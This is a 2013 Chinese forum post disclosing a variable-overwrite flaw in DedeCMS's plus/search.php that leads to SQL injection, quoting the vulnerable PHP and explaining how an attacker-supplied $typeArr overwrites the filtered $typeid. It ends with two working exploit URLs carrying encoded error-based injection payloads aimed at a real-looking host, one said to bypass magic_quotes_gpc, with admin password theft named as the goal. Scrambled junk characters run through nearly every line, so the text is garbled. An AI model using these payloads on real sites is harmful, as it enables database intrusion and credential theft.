微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.' J% K/ r; {6 @0 d7 G5 \! E/ Z) b
作者: c4rp3nt3r@0x50sec.org
# W8 I" C" ]8 N" e( ?Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
; N4 j: t1 v0 x( z% V) _9 j
0 G; U3 v: R' t8 h. Z, d* h P! w黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.1 \6 H! h6 ~$ C: B* o
; L' t s6 `) O, ]0 V% o6 a
============& O- c7 E/ r/ t/ a0 I/ X
# R2 t2 m$ K8 e2 S * m0 B- F1 r2 d$ }$ I) s3 V" r! L
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.: b) `+ ~+ G. Y( o; n
6 ?# s$ [2 m x1 J. v- X
require_once(dirname(__FILE__).”/../include/common.inc.php”);' F, z5 d& y) L- m k2 E7 l' a+ H
require_once(DEDEINC.”/arc.searchview.class.php”);
/ h7 L* S4 U2 e. [ Q9 K. a$ q% y" U) ^
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;9 z* f J$ E) {( V
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;; ^8 m% U* l# P) ^
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;+ \# w8 N* ]' F M" N6 f
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
2 P9 y c1 o6 i( L; ] [( c$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
; V5 [ x/ \* W7 J% b" f& G; p - M, q6 E% [: K3 H* S
if(!isset($orderby)) $orderby=”;& i% c0 @2 \% i f+ K' [
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);% h5 X3 S, \1 a0 U% m
' R5 z% j8 K, m8 W: k % i$ P5 b( k; H3 q, Z: d
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
# D" Q) r4 L" t, k @3 ]5 delse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);) O. `: D) |) F- J* G3 S8 s
/ B2 T" J1 S) j6 U) L. C* g+ _
if(!isset($keyword)){% ~! k4 `" S& x+ B9 c: d
if(!isset($q)) $q = ”;( g: G- ~$ J: _, G& _) f, j; [% o
$keyword=$q;/ Q8 W2 M+ u9 R
}
' O" J$ e# c" b9 u% A! W ; O& s+ R3 w( W) h; O
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
. B/ w( Y/ h" M: {9 Y ( U! R3 M4 w/ p! @
//查找栏目信息, H/ Q) e6 m3 q/ O+ S4 m0 y
if(empty($typeid))/ V# t% D; _3 z3 s5 i
{
/ W& F4 ?4 S& P0 x $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;1 k2 d6 R0 ]$ P8 ~) y B; s
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
7 P8 E: p" C& P/ u2 u {# t- g& K3 c5 d% t0 _9 |; g3 [
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);+ S+ h& Y4 m2 ]: Q9 V
fwrite($fp, “<”.”?php\r\n”);
* f! ~: w* X5 X" x) c $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
/ m$ y4 A: h, b5 f7 O- [ $dsql->Execute();& G1 j* @1 k6 z' f( _& I3 S
while($row = $dsql->GetArray())4 U- e! Q4 A7 ^* v% r# C
{/ K+ q7 ^% H8 c
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);# _: G# v- D' _1 K. R# O
}. d$ ?8 @) N/ S0 O8 `* [
fwrite($fp, ‘?’.'>’);: J: y$ e( x; D
fclose($fp);2 |+ }8 R( t1 f G" X
}
9 r- h6 z. y' K/ p" x: J2 n //引入栏目缓存并看关键字是否有相关栏目内容8 |; [0 L+ s/ v$ g9 p
require_once($typenameCacheFile);6 r, n" Y6 k! N* H
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个. P9 O; j# N+ w
//4 u' n, X" @6 L, J" P/ G; o7 x
if(isset($typeArr) && is_array($typeArr))) t8 V! K/ V% Z9 {+ f# t f9 [( k
{: C" J4 M- B* Z5 k5 _# s
foreach($typeArr as $id=>$typename): w N# H M- m4 o) B6 t+ h
{ \9 O: N: C9 X: m
. g5 c5 L1 \8 Y: w. ~1 a <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
. v2 V" r8 m$ s' |( {" i if($keyword != $keywordn)
- s* ?% a. _. q B( R {
2 L' O7 ~3 d1 U" I" S0 A- I $keyword = $keywordn;
( B& N; X/ b5 \2 j; F5 D: ?1 @; k <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设1 s0 K! d5 N& F* u5 Q& X$ o
break;
9 F3 e9 U" B; [; M }1 F1 y" l1 A0 ^" l( ?
}
7 i3 [, j* ?$ J9 M }
t" V! C5 l3 F# J( r/ S- t}5 O) b5 y/ l) l! j9 u
然后plus/search.php文件下面定义了一个 Search类的对象 . A$ I4 ^6 U; @9 F/ j
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.$ Q( f0 N' r+ Q( W0 G
$this->TypeLink = new TypeLink($typeid);
0 L& X1 M8 s. i0 Z7 l 9 w2 y$ @ Y' h& ~
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
0 f! B# Y: O" [1 I9 l8 H+ M, E
" P1 z) d3 @$ l. d0 eclass TypeLink
! j2 T2 m* k* s5 b' f5 X g{1 \" ]( p9 V8 A/ S2 D5 z
var $typeDir;3 ^/ Y0 U- ~5 p/ \$ ~
var $dsql;7 v4 ?4 P, X$ V9 b/ j
var $TypeID;1 j# C* a( S9 q* [- z8 H
var $baseDir;
b' m4 q% f9 x. x' g" B* _2 N$ i var $modDir;& d1 M6 t0 H0 ]+ L( l
var $indexUrl;; Z! u- a1 _$ Q; \% n1 Y5 _6 @
var $indexName;
- T0 u) e$ k( X, }( t! i6 ? var $TypeInfos;' P4 C- Q" j) T
var $SplitSymbol;" o# y5 h. v; k, ?$ W# r
var $valuePosition;$ c1 q2 Z. a d8 W# ?# y0 a' Y! B
var $valuePositionName;. F1 o7 \1 w {( D) ^2 J( J
var $OptionArrayList;//构造函数///////
4 l) K' C L3 `2 s //php5构造函数% x$ u+ J) c3 E& |
function __construct($typeid)
/ F8 l0 \0 [. P( y! y" T. B {
, a) x6 t# c6 J( f) L% T. G4 E $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];& @3 Y9 _: x+ O5 U7 l0 p
$this->indexName = $GLOBALS['cfg_indexname'];
3 k# ~# `7 O/ Y' y) Y; ]" Z $this->baseDir = $GLOBALS['cfg_basedir'];
+ @( G( I- S% Y2 k. T) b1 G. h $this->modDir = $GLOBALS['cfg_templets_dir'];# I( X4 U6 o! B% g; o; O
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
( B" Y! q3 w( c8 M2 \! j $this->dsql = $GLOBALS['dsql'];
4 G, e- _$ ~3 @1 Q2 O: j+ z $this->TypeID = $typeid;
6 H2 p1 _- Z6 a: {) \ $this->valuePosition = ”;. R/ ~# ?% f6 f
$this->valuePositionName = ”;
9 w- B, i6 \, {5 a1 S3 G2 y7 { $this->typeDir = ”;$ `+ c' H! c$ T3 o8 q2 T* x7 W
$this->OptionArrayList = ”;
$ y; t* H, f" Q9 d$ k0 J ?
/ h% v0 S& ^5 I+ U8 L# D! l //载入类目信息9 J* k) F' S3 A5 k( _1 {) Q
: U6 H3 ?5 w) k" m" \
<font color=”Red”>$query = “SELECT tp.*,ch.typename as1 J: H' _+ i. W. n
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join% W. D# x! n# M+ n( x! M' T
`#@__channeltype` ch* e8 M- v) S# o8 Z; c) h1 A& o
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
3 G! {, y9 Y4 \4 Y , }9 ]! @' q n+ z
if($typeid > 0)
5 A% F9 U! k! m) } {5 H5 ~: D$ `; e2 D( v e
$this->TypeInfos = $this->dsql->GetOne($query);
! z" O6 ^2 v) X9 i, |3 o G利用代码一 需要 即使magic_quotes_gpc = Off b7 E! e( g/ b0 ~0 U3 I5 _$ l
1 }4 q1 j6 A( J. |www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
/ |8 g, {5 {' V% b% ]
4 }8 s4 {! E6 u+ n+ t& {这只是其中一个利用代码… Search 类的构造函数再往下
0 O2 F3 H: v- p( _! k6 h
3 ~7 q- _2 K3 o* q……省略/ |8 f+ m9 l: m# Y
$this->TypeID = $typeid;/ q" @& D$ m2 b% o
……省略
' G" n+ H; Q8 P( l0 rif($this->TypeID==”0″){7 Y v! V& v" R7 p" p& c
$this->ChannelTypeid=1;# e" N0 f* i" B1 J V. m
}else{0 t' w, f+ R2 P
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲( K% u2 |; ~6 @5 Q# q4 G! G
//现在不鸡肋了吧亲…
K' C: ]( a! _3 W $this->ChannelTypeid=$row['channeltype'];
( ]8 o3 t4 {( i; \* d, W
8 z" t1 U H8 e* S }/ M% J, l8 p# J# X9 c \
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
- }/ Y1 l$ g0 w: @+ b7 C
9 O ^$ z9 N: Q6 twww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
8 O. t/ b: }0 n# J9 T0 @# _ 8 C i( k1 {; f; {* C
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
2 V; R, e- \' n9 Y! f1 }0 D$ [ |
发表于 2013-1-19 08:18:56
收藏
支持
反对